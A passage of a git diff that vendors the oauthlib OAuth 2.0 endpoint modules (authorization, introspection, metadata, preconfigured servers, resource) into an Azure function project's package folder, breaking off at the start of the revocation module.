/dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/resource.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/revocation.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/revocation.cpython-39.pyc new file mode 100644 index 0000000..256d2f1 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/revocation.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/token.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/token.cpython-39.pyc new file mode 100644 index 0000000..34969f5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/token.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/authorization.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/authorization.py new file mode 100644 index 0000000..c02e7fa --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/authorization.py @@ -0,0 +1,114 @@ +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +import logging + +from oauthlib.common import Request +from oauthlib.oauth2.rfc6749 import utils + +from .base import BaseEndpoint, catch_errors_and_unavailability + +log = logging.getLogger(__name__) + + +class AuthorizationEndpoint(BaseEndpoint): + + """Authorization endpoint - used by the client to obtain authorization + from the resource owner via user-agent redirection. + + The authorization endpoint is used to interact with the resource + owner and obtain an authorization grant. The authorization server + MUST first verify the identity of the resource owner. The way in + which the authorization server authenticates the resource owner (e.g. + username and password login, session cookies) is beyond the scope of + this specification. + + The endpoint URI MAY include an "application/x-www-form-urlencoded" + formatted (per `Appendix B`_) query component, + which MUST be retained when adding additional query parameters. The + endpoint URI MUST NOT include a fragment component:: + + https://example.com/path?query=component # OK + https://example.com/path?query=component#fragment # Not OK + + Since requests to the authorization endpoint result in user + authentication and the transmission of clear-text credentials (in the + HTTP response), the authorization server MUST require the use of TLS + as described in Section 1.6 when sending requests to the + authorization endpoint:: + + # We will deny any request which URI schema is not with https + + The authorization server MUST support the use of the HTTP "GET" + method [RFC2616] for the authorization endpoint, and MAY support the + use of the "POST" method as well:: + + # HTTP method is currently not enforced + + Parameters sent without a value MUST be treated as if they were + omitted from the request. The authorization server MUST ignore + unrecognized request parameters. Request and response parameters + MUST NOT be included more than once:: + + # Enforced through the design of oauthlib.common.Request + + .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + """ + + def __init__(self, default_response_type, default_token_type, + response_types): + BaseEndpoint.__init__(self) + self._response_types = response_types + self._default_response_type = default_response_type + self._default_token_type = default_token_type + + @property + def response_types(self): + return self._response_types + + @property + def default_response_type(self): + return self._default_response_type + + @property + def default_response_type_handler(self): + return self.response_types.get(self.default_response_type) + + @property + def default_token_type(self): + return self._default_token_type + + @catch_errors_and_unavailability + def create_authorization_response(self, uri, http_method='GET', body=None, + headers=None, scopes=None, credentials=None): + """Extract response_type and route to the designated handler.""" + request = Request( + uri, http_method=http_method, body=body, headers=headers) + request.scopes = scopes + # TODO: decide whether this should be a required argument + request.user = None # TODO: explain this in docs + for k, v in (credentials or {}).items(): + setattr(request, k, v) + response_type_handler = self.response_types.get( + request.response_type, self.default_response_type_handler) + log.debug('Dispatching response_type %s request to %r.', + request.response_type, response_type_handler) + return response_type_handler.create_authorization_response( + request, self.default_token_type) + + @catch_errors_and_unavailability + def validate_authorization_request(self, uri, http_method='GET', body=None, + headers=None): + """Extract response_type and route to the designated handler.""" + request = Request( + uri, http_method=http_method, body=body, headers=headers) + + request.scopes = utils.scope_to_list(request.scope) + + response_type_handler = self.response_types.get( + request.response_type, self.default_response_type_handler) + return response_type_handler.validate_authorization_request(request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/base.py new file mode 100644 index 0000000..7d572f4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/base.py @@ -0,0 +1,113 @@ +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +import functools +import logging + +from ..errors import ( + FatalClientError, InvalidClientError, InvalidRequestError, OAuth2Error, + ServerError, TemporarilyUnavailableError, UnsupportedTokenTypeError, +) + +log = logging.getLogger(__name__) + + +class BaseEndpoint: + + def __init__(self): + self._available = True + self._catch_errors = False + self._valid_request_methods = None + + @property + def valid_request_methods(self): + return self._valid_request_methods + + @valid_request_methods.setter + def valid_request_methods(self, valid_request_methods): + if valid_request_methods is not None: + valid_request_methods = [x.upper() for x in valid_request_methods] + self._valid_request_methods = valid_request_methods + + + @property + def available(self): + return self._available + + @available.setter + def available(self, available): + self._available = available + + @property + def catch_errors(self): + return self._catch_errors + + @catch_errors.setter + def catch_errors(self, catch_errors): + self._catch_errors = catch_errors + + def _raise_on_missing_token(self, request): + """Raise error on missing token.""" + if not request.token: + raise InvalidRequestError(request=request, + description='Missing token parameter.') + def _raise_on_invalid_client(self, request): + """Raise on failed client authentication.""" + if self.request_validator.client_authentication_required(request): + if not self.request_validator.authenticate_client(request): + log.debug('Client authentication failed, %r.', request) + raise InvalidClientError(request=request) + elif not self.request_validator.authenticate_client_id(request.client_id, request): + log.debug('Client authentication failed, %r.', request) + raise InvalidClientError(request=request) + + def _raise_on_unsupported_token(self, request): + """Raise on unsupported tokens.""" + if (request.token_type_hint and + request.token_type_hint in self.valid_token_types and + request.token_type_hint not in self.supported_token_types): + raise UnsupportedTokenTypeError(request=request) + + def _raise_on_bad_method(self, request): + if self.valid_request_methods is None: + raise ValueError('Configure "valid_request_methods" property first') + if request.http_method.upper() not in self.valid_request_methods: + raise InvalidRequestError(request=request, + description=('Unsupported request method %s' % request.http_method.upper())) + + def _raise_on_bad_post_request(self, request): + """Raise if invalid POST request received + """ + if request.http_method.upper() == 'POST': + query_params = request.uri_query or "" + if query_params: + raise InvalidRequestError(request=request, + description=('URL query parameters are not allowed')) + +def catch_errors_and_unavailability(f): + @functools.wraps(f) + def wrapper(endpoint, uri, *args, **kwargs): + if not endpoint.available: + e = TemporarilyUnavailableError() + log.info('Endpoint unavailable, ignoring request %s.' % uri) + return {}, e.json, 503 + + if endpoint.catch_errors: + try: + return f(endpoint, uri, *args, **kwargs) + except OAuth2Error: + raise + except FatalClientError: + raise + except Exception as e: + error = ServerError() + log.warning( + 'Exception caught while processing request, %s.' % e) + return {}, error.json, 500 + else: + return f(endpoint, uri, *args, **kwargs) + return wrapper diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/introspect.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/introspect.py new file mode 100644 index 0000000..5869d66 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/introspect.py @@ -0,0 +1,122 @@ +""" +oauthlib.oauth2.rfc6749.endpoint.introspect +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +An implementation of the OAuth 2.0 `Token Introspection`. + +.. _`Token Introspection`: https://tools.ietf.org/html/rfc7662 +""" +import json +import logging + +from oauthlib.common import Request + +from ..errors import OAuth2Error +from .base import BaseEndpoint, catch_errors_and_unavailability + +log = logging.getLogger(__name__) + + +class IntrospectEndpoint(BaseEndpoint): + + """Introspect token endpoint. + + This endpoint defines a method to query an OAuth 2.0 authorization + server to determine the active state of an OAuth 2.0 token and to + determine meta-information about this token. OAuth 2.0 deployments + can use this method to convey information about the authorization + context of the token from the authorization server to the protected + resource. + + To prevent the values of access tokens from leaking into + server-side logs via query parameters, an authorization server + offering token introspection MAY disallow the use of HTTP GET on + the introspection endpoint and instead require the HTTP POST method + to be used at the introspection endpoint. + """ + + valid_token_types = ('access_token', 'refresh_token') + valid_request_methods = ('POST',) + + def __init__(self, request_validator, supported_token_types=None): + BaseEndpoint.__init__(self) + self.request_validator = request_validator + self.supported_token_types = ( + supported_token_types or self.valid_token_types) + + @catch_errors_and_unavailability + def create_introspect_response(self, uri, http_method='POST', body=None, + headers=None): + """Create introspect valid or invalid response + + If the authorization server is unable to determine the state + of the token without additional information, it SHOULD return + an introspection response indicating the token is not active + as described in Section 2.2. + """ + resp_headers = { + 'Content-Type': 'application/json', + 'Cache-Control': 'no-store', + 'Pragma': 'no-cache', + } + request = Request(uri, http_method, body, headers) + try: + self.validate_introspect_request(request) + log.debug('Token introspect valid for %r.', request) + except OAuth2Error as e: + log.debug('Client error during validation of %r. %r.', request, e) + resp_headers.update(e.headers) + return resp_headers, e.json, e.status_code + + claims = self.request_validator.introspect_token( + request.token, + request.token_type_hint, + request + ) + if claims is None: + return resp_headers, json.dumps(dict(active=False)), 200 + if "active" in claims: + claims.pop("active") + return resp_headers, json.dumps(dict(active=True, **claims)), 200 + + def validate_introspect_request(self, request): + """Ensure the request is valid. + + The protected resource calls the introspection endpoint using + an HTTP POST request with parameters sent as + "application/x-www-form-urlencoded". + + token REQUIRED. The string value of the token. + + token_type_hint OPTIONAL. + A hint about the type of the token submitted for + introspection. The protected resource MAY pass this parameter to + help the authorization server optimize the token lookup. If the + server is unable to locate the token using the given hint, it MUST + extend its search across all of its supported token types. An + authorization server MAY ignore this parameter, particularly if it + is able to detect the token type automatically. + * access_token: An Access Token as defined in [`RFC6749`], + `section 1.4`_ + + * refresh_token: A Refresh Token as defined in [`RFC6749`], + `section 1.5`_ + + The introspection endpoint MAY accept other OPTIONAL + parameters to provide further context to the query. For + instance, an authorization server may desire to know the IP + address of the client accessing the protected resource to + determine if the correct client is likely to be presenting the + token. The definition of this or any other parameters are + outside the scope of this specification, to be defined by + service documentation or extensions to this specification. + + .. _`section 1.4`: http://tools.ietf.org/html/rfc6749#section-1.4 + .. _`section 1.5`: http://tools.ietf.org/html/rfc6749#section-1.5 + .. _`RFC6749`: http://tools.ietf.org/html/rfc6749 + """ + self._raise_on_bad_method(request) + self._raise_on_bad_post_request(request) + self._raise_on_missing_token(request) + self._raise_on_invalid_client(request) + self._raise_on_unsupported_token(request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/metadata.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/metadata.py new file mode 100644 index 0000000..d18edc3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/metadata.py @@ -0,0 +1,238 @@ +""" +oauthlib.oauth2.rfc6749.endpoint.metadata +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +An implementation of the `OAuth 2.0 Authorization Server Metadata`. + +.. _`OAuth 2.0 Authorization Server Metadata`: https://tools.ietf.org/html/rfc8414 +""" +import copy +import json +import logging + +from .. import grant_types +from .authorization import AuthorizationEndpoint +from .base import BaseEndpoint, catch_errors_and_unavailability +from .introspect import IntrospectEndpoint +from .revocation import RevocationEndpoint +from .token import TokenEndpoint + +log = logging.getLogger(__name__) + + +class MetadataEndpoint(BaseEndpoint): + + """OAuth2.0 Authorization Server Metadata endpoint. + + This specification generalizes the metadata format defined by + `OpenID Connect Discovery 1.0` in a way that is compatible + with OpenID Connect Discovery while being applicable to a wider set + of OAuth 2.0 use cases. This is intentionally parallel to the way + that OAuth 2.0 Dynamic Client Registration Protocol [`RFC7591`_] + generalized the dynamic client registration mechanisms defined by + OpenID Connect Dynamic Client Registration 1.0 + in a way that is compatible with it. + + .. _`OpenID Connect Discovery 1.0`: https://openid.net/specs/openid-connect-discovery-1_0.html + .. _`RFC7591`: https://tools.ietf.org/html/rfc7591 + """ + + def __init__(self, endpoints, claims={}, raise_errors=True): + assert isinstance(claims, dict) + for endpoint in endpoints: + assert isinstance(endpoint, BaseEndpoint) + + BaseEndpoint.__init__(self) + self.raise_errors = raise_errors + self.endpoints = endpoints + self.initial_claims = claims + self.claims = self.validate_metadata_server() + + @catch_errors_and_unavailability + def create_metadata_response(self, uri, http_method='GET', body=None, + headers=None): + """Create metadata response + """ + headers = { + 'Content-Type': 'application/json', + 'Access-Control-Allow-Origin': '*', + } + return headers, json.dumps(self.claims), 200 + + def validate_metadata(self, array, key, is_required=False, is_list=False, is_url=False, is_issuer=False): + if not self.raise_errors: + return + + if key not in array: + if is_required: + raise ValueError("key {} is a mandatory metadata.".format(key)) + + elif is_issuer: + if not array[key].startswith("https"): + raise ValueError("key {}: {} must be an HTTPS URL".format(key, array[key])) + if "?" in array[key] or "&" in array[key] or "#" in array[key]: + raise ValueError("key {}: {} must not contain query or fragment components".format(key, array[key])) + + elif is_url: + if not array[key].startswith("http"): + raise ValueError("key {}: {} must be an URL".format(key, array[key])) + + elif is_list: + if not isinstance(array[key], list): + raise ValueError("key {}: {} must be an Array".format(key, array[key])) + for elem in array[key]: + if not isinstance(elem, str): + raise ValueError("array {}: {} must contains only string (not {})".format(key, array[key], elem)) + + def validate_metadata_token(self, claims, endpoint): + """ + If the token endpoint is used in the grant type, the value of this + parameter MUST be the same as the value of the "grant_type" + parameter passed to the token endpoint defined in the grant type + definition. + """ + self._grant_types.extend(endpoint._grant_types.keys()) + claims.setdefault("token_endpoint_auth_methods_supported", ["client_secret_post", "client_secret_basic"]) + + self.validate_metadata(claims, "token_endpoint_auth_methods_supported", is_list=True) + self.validate_metadata(claims, "token_endpoint_auth_signing_alg_values_supported", is_list=True) + self.validate_metadata(claims, "token_endpoint", is_required=True, is_url=True) + + def validate_metadata_authorization(self, claims, endpoint): + claims.setdefault("response_types_supported", + list(filter(lambda x: x != "none", endpoint._response_types.keys()))) + claims.setdefault("response_modes_supported", ["query", "fragment"]) + + # The OAuth2.0 Implicit flow is defined as a "grant type" but it is not + # using the "token" endpoint, as such, we have to add it explicitly to + # the list of "grant_types_supported" when enabled. + if "token" in claims["response_types_supported"]: + self._grant_types.append("implicit") + + self.validate_metadata(claims, "response_types_supported", is_required=True, is_list=True) + self.validate_metadata(claims, "response_modes_supported", is_list=True) + if "code" in claims["response_types_supported"]: + code_grant = endpoint._response_types["code"] + if not isinstance(code_grant, grant_types.AuthorizationCodeGrant) and hasattr(code_grant, "default_grant"): + code_grant = code_grant.default_grant + + claims.setdefault("code_challenge_methods_supported", + list(code_grant._code_challenge_methods.keys())) + self.validate_metadata(claims, "code_challenge_methods_supported", is_list=True) + self.validate_metadata(claims, "authorization_endpoint", is_required=True, is_url=True) + + def validate_metadata_revocation(self, claims, endpoint): + claims.setdefault("revocation_endpoint_auth_methods_supported", + ["client_secret_post", "client_secret_basic"]) + + self.validate_metadata(claims, "revocation_endpoint_auth_methods_supported", is_list=True) + self.validate_metadata(claims, "revocation_endpoint_auth_signing_alg_values_supported", is_list=True) + self.validate_metadata(claims, "revocation_endpoint", is_required=True, is_url=True) + + def validate_metadata_introspection(self, claims, endpoint): + claims.setdefault("introspection_endpoint_auth_methods_supported", + ["client_secret_post", "client_secret_basic"]) + + self.validate_metadata(claims, "introspection_endpoint_auth_methods_supported", is_list=True) + self.validate_metadata(claims, "introspection_endpoint_auth_signing_alg_values_supported", is_list=True) + self.validate_metadata(claims, "introspection_endpoint", is_required=True, is_url=True) + + def validate_metadata_server(self): + """ + Authorization servers can have metadata describing their + configuration. The following authorization server metadata values + are used by this specification. More details can be found in + `RFC8414 section 2`_ : + + issuer + REQUIRED + + authorization_endpoint + URL of the authorization server's authorization endpoint + [`RFC6749#Authorization`_]. This is REQUIRED unless no grant types are supported + that use the authorization endpoint. + + token_endpoint + URL of the authorization server's token endpoint [`RFC6749#Token`_]. This + is REQUIRED unless only the implicit grant type is supported. + + scopes_supported + RECOMMENDED. + + response_types_supported + REQUIRED. + + Other OPTIONAL fields: + jwks_uri, + registration_endpoint, + response_modes_supported + + grant_types_supported + OPTIONAL. JSON array containing a list of the OAuth 2.0 grant + type values that this authorization server supports. The array + values used are the same as those used with the "grant_types" + parameter defined by "OAuth 2.0 Dynamic Client Registration + Protocol" [`RFC7591`_]. If omitted, the default value is + "["authorization_code", "implicit"]". + + token_endpoint_auth_methods_supported + + token_endpoint_auth_signing_alg_values_supported + + service_documentation + + ui_locales_supported + + op_policy_uri + + op_tos_uri + + revocation_endpoint + + revocation_endpoint_auth_methods_supported + + revocation_endpoint_auth_signing_alg_values_supported + + introspection_endpoint + + introspection_endpoint_auth_methods_supported + + introspection_endpoint_auth_signing_alg_values_supported + + code_challenge_methods_supported + + Additional authorization server metadata parameters MAY also be used. + Some are defined by other specifications, such as OpenID Connect + Discovery 1.0 [`OpenID.Discovery`_]. + + .. _`RFC8414 section 2`: https://tools.ietf.org/html/rfc8414#section-2 + .. _`RFC6749#Authorization`: https://tools.ietf.org/html/rfc6749#section-3.1 + .. _`RFC6749#Token`: https://tools.ietf.org/html/rfc6749#section-3.2 + .. _`RFC7591`: https://tools.ietf.org/html/rfc7591 + .. _`OpenID.Discovery`: https://openid.net/specs/openid-connect-discovery-1_0.html + """ + claims = copy.deepcopy(self.initial_claims) + self.validate_metadata(claims, "issuer", is_required=True, is_issuer=True) + self.validate_metadata(claims, "jwks_uri", is_url=True) + self.validate_metadata(claims, "scopes_supported", is_list=True) + self.validate_metadata(claims, "service_documentation", is_url=True) + self.validate_metadata(claims, "ui_locales_supported", is_list=True) + self.validate_metadata(claims, "op_policy_uri", is_url=True) + self.validate_metadata(claims, "op_tos_uri", is_url=True) + + self._grant_types = [] + for endpoint in self.endpoints: + if isinstance(endpoint, TokenEndpoint): + self.validate_metadata_token(claims, endpoint) + if isinstance(endpoint, AuthorizationEndpoint): + self.validate_metadata_authorization(claims, endpoint) + if isinstance(endpoint, RevocationEndpoint): + self.validate_metadata_revocation(claims, endpoint) + if isinstance(endpoint, IntrospectEndpoint): + self.validate_metadata_introspection(claims, endpoint) + + # "grant_types_supported" is a combination of all OAuth2 grant types + # allowed in the current provider implementation. + claims.setdefault("grant_types_supported", self._grant_types) + self.validate_metadata(claims, "grant_types_supported", is_list=True) + return claims diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/pre_configured.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/pre_configured.py new file mode 100644 index 0000000..326202c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/pre_configured.py @@ -0,0 +1,216 @@ +""" +oauthlib.oauth2.rfc6749.endpoints.pre_configured +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various endpoints needed +for providing OAuth 2.0 RFC6749 servers. +""" +from ..grant_types import ( + AuthorizationCodeGrant, ClientCredentialsGrant, ImplicitGrant, + RefreshTokenGrant, ResourceOwnerPasswordCredentialsGrant, +) +from ..tokens import BearerToken +from .authorization import AuthorizationEndpoint +from .introspect import IntrospectEndpoint +from .resource import ResourceEndpoint +from .revocation import RevocationEndpoint +from .token import TokenEndpoint + + +class Server(AuthorizationEndpoint, IntrospectEndpoint, TokenEndpoint, + ResourceEndpoint, RevocationEndpoint): + + """An all-in-one endpoint featuring all four major grant types.""" + + def __init__(self, request_validator, token_expires_in=None, + token_generator=None, refresh_token_generator=None, + *args, **kwargs): + """Construct a new all-grants-in-one server. + + :param request_validator: An implementation of + oauthlib.oauth2.RequestValidator. + :param token_expires_in: An int or a function to generate a token + expiration offset (in seconds) given a + oauthlib.common.Request object. + :param token_generator: A function to generate a token from a request. + :param refresh_token_generator: A function to generate a token from a + request for the refresh token. + :param kwargs: Extra parameters to pass to authorization-, + token-, resource-, and revocation-endpoint constructors. + """ + self.auth_grant = AuthorizationCodeGrant(request_validator) + self.implicit_grant = ImplicitGrant(request_validator) + self.password_grant = ResourceOwnerPasswordCredentialsGrant( + request_validator) + self.credentials_grant = ClientCredentialsGrant(request_validator) + self.refresh_grant = RefreshTokenGrant(request_validator) + + self.bearer = BearerToken(request_validator, token_generator, + token_expires_in, refresh_token_generator) + + AuthorizationEndpoint.__init__(self, default_response_type='code', + response_types={ + 'code': self.auth_grant, + 'token': self.implicit_grant, + 'none': self.auth_grant + }, + default_token_type=self.bearer) + + TokenEndpoint.__init__(self, default_grant_type='authorization_code', + grant_types={ + 'authorization_code': self.auth_grant, + 'password': self.password_grant, + 'client_credentials': self.credentials_grant, + 'refresh_token': self.refresh_grant, + }, + default_token_type=self.bearer) + ResourceEndpoint.__init__(self, default_token='Bearer', + token_types={'Bearer': self.bearer}) + RevocationEndpoint.__init__(self, request_validator) + IntrospectEndpoint.__init__(self, request_validator) + + +class WebApplicationServer(AuthorizationEndpoint, IntrospectEndpoint, TokenEndpoint, + ResourceEndpoint, RevocationEndpoint): + + """An all-in-one endpoint featuring Authorization code grant and Bearer tokens.""" + + def __init__(self, request_validator, token_generator=None, + token_expires_in=None, refresh_token_generator=None, **kwargs): + """Construct a new web application server. + + :param request_validator: An implementation of + oauthlib.oauth2.RequestValidator. + :param token_expires_in: An int or a function to generate a token + expiration offset (in seconds) given a + oauthlib.common.Request object. + :param token_generator: A function to generate a token from a request. + :param refresh_token_generator: A function to generate a token from a + request for the refresh token. + :param kwargs: Extra parameters to pass to authorization-, + token-, resource-, and revocation-endpoint constructors. + """ + self.auth_grant = AuthorizationCodeGrant(request_validator) + self.refresh_grant = RefreshTokenGrant(request_validator) + self.bearer = BearerToken(request_validator, token_generator, + token_expires_in, refresh_token_generator) + AuthorizationEndpoint.__init__(self, default_response_type='code', + response_types={'code': self.auth_grant}, + default_token_type=self.bearer) + TokenEndpoint.__init__(self, default_grant_type='authorization_code', + grant_types={ + 'authorization_code': self.auth_grant, + 'refresh_token': self.refresh_grant, + }, + default_token_type=self.bearer) + ResourceEndpoint.__init__(self, default_token='Bearer', + token_types={'Bearer': self.bearer}) + RevocationEndpoint.__init__(self, request_validator) + IntrospectEndpoint.__init__(self, request_validator) + + +class MobileApplicationServer(AuthorizationEndpoint, IntrospectEndpoint, + ResourceEndpoint, RevocationEndpoint): + + """An all-in-one endpoint featuring Implicit code grant and Bearer tokens.""" + + def __init__(self, request_validator, token_generator=None, + token_expires_in=None, refresh_token_generator=None, **kwargs): + """Construct a new implicit grant server. + + :param request_validator: An implementation of + oauthlib.oauth2.RequestValidator. + :param token_expires_in: An int or a function to generate a token + expiration offset (in seconds) given a + oauthlib.common.Request object. + :param token_generator: A function to generate a token from a request. + :param refresh_token_generator: A function to generate a token from a + request for the refresh token. + :param kwargs: Extra parameters to pass to authorization-, + token-, resource-, and revocation-endpoint constructors. + """ + self.implicit_grant = ImplicitGrant(request_validator) + self.bearer = BearerToken(request_validator, token_generator, + token_expires_in, refresh_token_generator) + AuthorizationEndpoint.__init__(self, default_response_type='token', + response_types={ + 'token': self.implicit_grant}, + default_token_type=self.bearer) + ResourceEndpoint.__init__(self, default_token='Bearer', + token_types={'Bearer': self.bearer}) + RevocationEndpoint.__init__(self, request_validator, + supported_token_types=['access_token']) + IntrospectEndpoint.__init__(self, request_validator, + supported_token_types=['access_token']) + + +class LegacyApplicationServer(TokenEndpoint, IntrospectEndpoint, + ResourceEndpoint, RevocationEndpoint): + + """An all-in-one endpoint featuring Resource Owner Password Credentials grant and Bearer tokens.""" + + def __init__(self, request_validator, token_generator=None, + token_expires_in=None, refresh_token_generator=None, **kwargs): + """Construct a resource owner password credentials grant server. + + :param request_validator: An implementation of + oauthlib.oauth2.RequestValidator. + :param token_expires_in: An int or a function to generate a token + expiration offset (in seconds) given a + oauthlib.common.Request object. + :param token_generator: A function to generate a token from a request. + :param refresh_token_generator: A function to generate a token from a + request for the refresh token. + :param kwargs: Extra parameters to pass to authorization-, + token-, resource-, and revocation-endpoint constructors. + """ + self.password_grant = ResourceOwnerPasswordCredentialsGrant( + request_validator) + self.refresh_grant = RefreshTokenGrant(request_validator) + self.bearer = BearerToken(request_validator, token_generator, + token_expires_in, refresh_token_generator) + TokenEndpoint.__init__(self, default_grant_type='password', + grant_types={ + 'password': self.password_grant, + 'refresh_token': self.refresh_grant, + }, + default_token_type=self.bearer) + ResourceEndpoint.__init__(self, default_token='Bearer', + token_types={'Bearer': self.bearer}) + RevocationEndpoint.__init__(self, request_validator) + IntrospectEndpoint.__init__(self, request_validator) + + +class BackendApplicationServer(TokenEndpoint, IntrospectEndpoint, + ResourceEndpoint, RevocationEndpoint): + + """An all-in-one endpoint featuring Client Credentials grant and Bearer tokens.""" + + def __init__(self, request_validator, token_generator=None, + token_expires_in=None, refresh_token_generator=None, **kwargs): + """Construct a client credentials grant server. + + :param request_validator: An implementation of + oauthlib.oauth2.RequestValidator. + :param token_expires_in: An int or a function to generate a token + expiration offset (in seconds) given a + oauthlib.common.Request object. + :param token_generator: A function to generate a token from a request. + :param refresh_token_generator: A function to generate a token from a + request for the refresh token. + :param kwargs: Extra parameters to pass to authorization-, + token-, resource-, and revocation-endpoint constructors. + """ + self.credentials_grant = ClientCredentialsGrant(request_validator) + self.bearer = BearerToken(request_validator, token_generator, + token_expires_in, refresh_token_generator) + TokenEndpoint.__init__(self, default_grant_type='client_credentials', + grant_types={ + 'client_credentials': self.credentials_grant}, + default_token_type=self.bearer) + ResourceEndpoint.__init__(self, default_token='Bearer', + token_types={'Bearer': self.bearer}) + RevocationEndpoint.__init__(self, request_validator, + supported_token_types=['access_token']) + IntrospectEndpoint.__init__(self, request_validator, + supported_token_types=['access_token']) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/resource.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/resource.py new file mode 100644 index 0000000..c43b211 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/resource.py @@ -0,0 +1,84 @@ +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +import logging + +from oauthlib.common import Request + +from .base import BaseEndpoint, catch_errors_and_unavailability + +log = logging.getLogger(__name__) + + +class ResourceEndpoint(BaseEndpoint): + + """Authorizes access to protected resources. + + The client accesses protected resources by presenting the access + token to the resource server. The resource server MUST validate the + access token and ensure that it has not expired and that its scope + covers the requested resource. The methods used by the resource + server to validate the access token (as well as any error responses) + are beyond the scope of this specification but generally involve an + interaction or coordination between the resource server and the + authorization server:: + + # For most cases, returning a 403 should suffice. + + The method in which the client utilizes the access token to + authenticate with the resource server depends on the type of access + token issued by the authorization server. Typically, it involves + using the HTTP "Authorization" request header field [RFC2617] with an + authentication scheme defined by the specification of the access + token type used, such as [RFC6750]:: + + # Access tokens may also be provided in query and body + https://example.com/protected?access_token=kjfch2345sdf # Query + access_token=sdf23409df # Body + """ + + def __init__(self, default_token, token_types): + BaseEndpoint.__init__(self) + self._tokens = token_types + self._default_token = default_token + + @property + def default_token(self): + return self._default_token + + @property + def default_token_type_handler(self): + return self.tokens.get(self.default_token) + + @property + def tokens(self): + return self._tokens + + @catch_errors_and_unavailability + def verify_request(self, uri, http_method='GET', body=None, headers=None, + scopes=None): + """Validate client, code etc, return body + headers""" + request = Request(uri, http_method, body, headers) + request.token_type = self.find_token_type(request) + request.scopes = scopes + token_type_handler = self.tokens.get(request.token_type, + self.default_token_type_handler) + log.debug('Dispatching token_type %s request to %r.', + request.token_type, token_type_handler) + return token_type_handler.validate_request(request), request + + def find_token_type(self, request): + """Token type identification. + + RFC 6749 does not provide a method for easily differentiating between + different token types during protected resource access. We estimate + the most likely token type (if any) by asking each known token type + to give an estimation based on the request. + """ + estimates = sorted(((t.estimate_type(request), n) + for n, t in self.tokens.items()), reverse=True) + return estimates[0][1] if len(estimates) else None diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/revocation.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/revocation.py new file mode 100644 index 0000000..6933d04 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/revocation.py @@ -0,0 +1,126 @@ +""" +oauthlib.oauth2.rfc6749.endpoint.revocation +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +An implementation of the OAuth 2 `Token Revocation`_ spec (draft 11). + +.. _`Token Revocation`: https://tools.ietf.org/html/draft-ietf-oauth-revocation-11 +""" +import logging + +from oauthlib.common import Request + +from ..errors import OAuth2Error +from .base import BaseEndpoint, catch_errors_and_unavailability + +log = logging.getLogger(__name__) + + +class 